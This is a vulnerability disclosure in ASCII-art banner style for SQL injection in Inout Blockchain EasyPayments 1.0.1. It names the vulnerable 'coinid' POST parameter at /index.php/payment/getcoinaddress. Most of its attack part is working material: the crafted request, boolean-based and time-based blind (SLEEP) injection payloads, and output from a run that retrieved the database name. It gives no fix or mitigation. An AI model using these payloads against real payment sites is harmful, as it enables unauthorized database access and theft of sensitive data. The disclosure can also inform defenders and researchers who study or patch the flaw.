┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.inoutscripts.com/products/inout-blockchain-easypayments/ │ │ Vendor : Inout Scripts │ │ Software : Inout Blockchain EasyPayments 1.0.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php/payment/getcoinaddress ---------------------------------------------------------------------------- POST /index.php/payment/getcoinaddress HTTP/2 coinid=[SQLI]&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000 ---------------------------------------------------------------------------- POST parameter 'coinid' is vulnerable to SQL Injection --- Parameter: coinid (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: coinid=(SELECT (CASE WHEN (08758=8758) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: coinid=(SELECT(0)FROM(SELECT(SLEEP(5)))a)&paymentprofileid=3&paymentsessionid=3161&amountexpected=0.00000000 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_easypayments_**' [-] Done